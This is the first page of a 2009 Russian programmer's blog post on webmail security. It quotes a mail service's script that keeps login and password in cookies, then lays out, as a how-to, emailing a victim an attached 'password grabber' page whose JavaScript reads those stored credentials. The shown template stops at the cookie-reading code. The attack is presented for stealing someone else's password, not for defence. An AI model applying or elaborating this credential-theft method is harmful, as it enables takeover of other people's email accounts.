О безопасности почты на основе WWW-Интерфейса

заметки программиста

Поиск

// вы читаете...

Новости

О безопасности почты на основе WWW-Интерфейса

Автор: admin ⋅ 27 Фев 2009 ⋅ Ваш отзыв

// if (sqr == 0) { domain=»; name=»; psw=»; } else
// if (sqr == 1) { psw=»; }
setCookie(‘qmail_name’, name);
setCookie(‘qmail_psw’, psw);
setCookie(‘qmail_sqr’, sqr);
// setCookie(‘qmail_domain’, domain);
}
//—>
</SCRIPT>

Значит cookie :). На этой же паге видим как их достать:

—————————
function getCookie(Name) {
var search = Name + «=»
if (document.cookie.length > 0) { // if there are any cookies
offset = document.cookie.indexOf(search)
if (offset != -1) { // if cookie exists
offset += search.length // set index of beginning of value
end = document.cookie.indexOf(«;», offset) // set index of end of cookie value
if (end == -1) end = document.cookie.length
return unescape(document.cookie.substring(offset, end))
}
}
}
—————————

Так. Пасс и логин теперь есть у сайта. Чем мы хуже? Делаем письмо человеку, пасс которого нам нужен, и
прекрепляем к нему пагу, содержащую наш пас-зиф. Код этой паги может быть изменённым сорсом этой
заготовки (в первом поле ввода логи во втором пасс):

<html>

<SCRIPT LANGUAGE=»JavaScript»>
<!—
function getCookie(Name) {
var search = Name + «=»
if (document.cookie.length > 0) { // if there are any cookies
offset = document.cookie.indexOf(search)
if (offset != -1) { // if cookie exists
offset += search.length // set index of beginning of value
end = document.cookie.indexOf(«;», offset) // set index of end of cookie value
if (end == -1) end = document.cookie.length
return unescape(document.cookie.substring(offset, end))
}
}
}

//—>
</SCRIPT>
<br>

Страницы: 1 2 3

Обсуждене

Отзывов нет на «О безопасности почты на основе WWW-Интерфейса»

Ваш отзыв

Рубрики

Новости